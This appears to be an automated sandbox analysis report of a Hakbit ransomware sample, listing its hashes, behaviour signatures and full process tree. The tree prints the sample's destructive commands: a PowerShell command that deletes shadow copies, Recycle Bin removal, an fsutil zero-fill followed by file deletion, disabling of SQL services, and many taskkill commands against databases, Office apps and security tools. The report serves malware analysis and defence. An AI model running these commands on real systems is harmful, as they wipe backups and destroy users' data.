Analysis

- max time kernel: 1794s
- max time network: 1805s
- platform: windows10-2004_x64
- resource: win10v2004-20240508-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 10-05-2024 18:05
Behavioral tasks

- behavioral1: Dropper/Berbew.exe (resource win10v2004-20240508-en)
- behavioral2: Dropper/Phorphiex.exe (resource win10v2004-20240426-en)
- behavioral3: RAT/31.exe (resource win10v2004-20240426-en)
- behavioral4: RAT/XClient.exe (resource win10v2004-20240508-en)
- behavioral5: RAT/file.exe (resource win10v2004-20240426-en)
- behavioral6: Ransomware/Client-2.exe (resource win10v2004-20240508-en)
- behavioral7: Ransomware/criticalupdate01.exe (resource win10v2004-20240226-en)
- behavioral8: Ransomware/default.exe (resource win10v2004-20240426-en)
- behavioral9: Stealers/Azorult.exe (resource win10v2004-20240508-en)
- behavioral10: Stealers/BlackMoon.exe (resource win10v2004-20240426-en)
- behavioral11: Stealers/Dridex.dll (resource win10v2004-20240426-en)
- behavioral12: Stealers/Masslogger/mouse_2.exe (resource win10v2004-20240508-en)
- behavioral13: Stealers/lumma.exe (resource win10v2004-20240426-en)
- behavioral14: Trojan/BetaBot.exe (resource win10v2004-20240508-en)
- behavioral15: Trojan/SmokeLoader.exe (resource win10v2004-20240426-en)
General

- Target: Ransomware/Client-2.exe
- Size: 80KB
- MD5: 8152a3d0d76f7e968597f4f834fdfa9d
- SHA1: c3cf05f3f79851d3c0d4266ab77c8e3e3f88c73e
- SHA256: 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b
- SHA512: eb1a18cb03131466a4152fa2f6874b70c760317148684ca9b95044e50dc9cd19316d6e68e680ce18599114ba73e75264de5dab5afe611165b9c6c0b5f01002b4
- SSDEEP: 1536:SHbigeMiIeMfZ7tOBbFv0CIG0dDh/suIicRtpNf8SgRXt+AacRDVX8C4OntD4acN:SHbigeMiIeMfZ7tOBbFv0CIG0dDh/su0
Malware Config

- Extracted from: C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
- Family: hakbit
Signatures

- Hakbit: Ransomware which encrypts files using AES, first seen in November 2019.
- Checks computer location settings (2 TTPs, 1 IoC): Looks up the country code configured in the registry, likely a geofence.
  Key value queried: \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation (Client-2.exe)
- Drops startup file (1 IoC)
  File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk (Client-2.exe)
- Reads user/profile data of web browsers (2 TTPs): Infostealers often target stored browser data, which can include saved credentials etc.
- Launches sc.exe (4 IoCs): Sc.exe is a Windows utility to control services on the system.
  PIDs: 4872 sc.exe, 1092 sc.exe, 3852 sc.exe, 4544 sc.exe
- Enumerates physical storage devices (1 TTP): Attempts to interact with connected storage/optical drive(s).
- Kills process with taskkill (47 IoCs)
- Opens file in notepad (likely ransom note) (1 IoC): PID 1632 notepad.exe
- Runs ping.exe (1 TTP, 1 IoC): PID 5776 PING.EXE
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
- Suspicious use of AdjustPrivilegeToken (48 IoCs)
- Suspicious use of FindShellTrayWindow (1 IoC): PID 2568 Client-2.exe
- Suspicious use of SendNotifyMessage (1 IoC): PID 2568 Client-2.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
Processes

- C:\Users\Admin\AppData\Local\Temp\Ransomware\Client-2.exe (PID 2568): "C:\Users\Admin\AppData\Local\Temp\Ransomware\Client-2.exe" [Checks computer location settings; Drops startup file; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage; Suspicious use of WriteProcessMemory]
  - C:\Windows\SYSTEM32\sc.exe (PID 1092): "sc.exe" config SQLTELEMETRY start= disabled [Launches sc.exe]
  - C:\Windows\SYSTEM32\sc.exe (PID 4872): "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled [Launches sc.exe]
  - C:\Windows\SYSTEM32\sc.exe (PID 4544): "sc.exe" config SQLWriter start= disabled [Launches sc.exe]
  - C:\Windows\SYSTEM32\sc.exe (PID 3852): "sc.exe" config SstpSvc start= disabled [Launches sc.exe]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 4984): "taskkill.exe" /IM mspub.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 2272): "taskkill.exe" /IM mydesktopqos.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\cmd.exe (PID 3780): "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
  - C:\Windows\SYSTEM32\taskkill.exe (PID 828): "taskkill.exe" /IM mydesktopservice.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 2580): "taskkill.exe" /IM mysqld.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 2308): "taskkill.exe" /IM sqbcoreservice.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 4284): "taskkill.exe" /IM firefoxconfig.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 3560): "taskkill.exe" /IM agntsvc.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 1444): "taskkill.exe" /IM thebat.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 3772): "taskkill.exe" /IM steam.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 4192): "taskkill.exe" /IM encsvc.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 5052): "taskkill.exe" /IM excel.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 3164): "taskkill.exe" /IM CNTAoSMgr.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 4572): "taskkill.exe" /IM sqlwriter.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 3256): "taskkill.exe" /IM tbirdconfig.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 1120): "taskkill.exe" /IM dbeng50.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 4240): "taskkill.exe" /IM thebat64.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 2172): "taskkill.exe" /IM ocomm.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 4588): "taskkill.exe" /IM infopath.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 1964): "taskkill.exe" /IM mbamtray.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 4636): "taskkill.exe" /IM zoolz.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 4548): "taskkill.exe" IM thunderbird.exe /F [Kills process with taskkill]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 4980): "taskkill.exe" /IM dbsnmp.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 3704): "taskkill.exe" /IM xfssvccon.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 1520): "taskkill.exe" /IM mspub.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 5100): "taskkill.exe" /IM Ntrtscan.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 2636): "taskkill.exe" /IM isqlplussvc.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 368): "taskkill.exe" /IM onenote.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 2992): "taskkill.exe" /IM PccNTMon.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 4672): "taskkill.exe" /IM msaccess.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 3248): "taskkill.exe" /IM outlook.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 752): "taskkill.exe" /IM tmlisten.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 872): "taskkill.exe" /IM msftesql.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 1164): "taskkill.exe" /IM powerpnt.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 3220): "taskkill.exe" /IM mydesktopqos.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 4028): "taskkill.exe" /IM visio.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 3696): "taskkill.exe" /IM mydesktopservice.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 1336): "taskkill.exe" /IM winword.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 4076): "taskkill.exe" /IM mysqld-nt.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 2708): "taskkill.exe" /IM wordpad.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 1428): "taskkill.exe" /IM mysqld-opt.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 1624): "taskkill.exe" /IM ocautoupds.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 2324): "taskkill.exe" /IM ocssd.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 3224): "taskkill.exe" /IM oracle.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 3372): "taskkill.exe" /IM sqlagent.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 1852): "taskkill.exe" /IM sqlbrowser.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 556): "taskkill.exe" /IM sqlservr.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\SYSTEM32\taskkill.exe (PID 1492): "taskkill.exe" /IM synctime.exe /F [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4840): "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); } [Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\System32\notepad.exe (PID 1632): "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt [Opens file in notepad (likely ransom note)]
  - C:\Windows\SYSTEM32\cmd.exe (PID 5888): "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
    - C:\Windows\system32\PING.EXE (PID 5776): ping 127.0.0.7 -n 3 [Runs ping.exe]
    - C:\Windows\system32\fsutil.exe (PID 5996): fsutil file setZeroData offset=0 length=524288 “%s”
  - C:\Windows\System32\cmd.exe (PID 2080): "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\Ransomware\Client-2.exe
    - C:\Windows\system32\choice.exe (PID 5132): choice /C Y /N /D Y /T 3
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 6700): "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4084,i,11266875042087428226,16669718873272757238,262144 --variations-seed-version --mojo-platform-channel-handle=1680 /prefetch:8
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3480): "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=1404,i,11266875042087428226,16669718873272757238,262144 --variations-seed-version --mojo-platform-channel-handle=2468 /prefetch:8
Network
MITRE ATT&CK Enterprise v15
Downloads

- Filesize: 1.3MB
- C:\ProgramData\Package Cache\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}v56.64.8804\windowsdesktop-runtime-7.0.16-win-x64.msi
  Filesize: 28.8MB
- C:\ProgramData\Package Cache\{2BB73336-4F69-4141-9797-E9BD6FE3980A}v64.8.8795\dotnet-host-8.0.2-win-x64.msi.energy[[email protected]]
  Filesize: 728KB
- C:\ProgramData\Package Cache\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}v48.108.8828\dotnet-runtime-6.0.27-win-x64.msi
  Filesize: 25.7MB
- C:\ProgramData\Package Cache\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi.energy[[email protected]]
  Filesize: 180KB
- Filesize: 2KB
- Filesize: 944B
- Filesize: 60B
- Filesize: 828B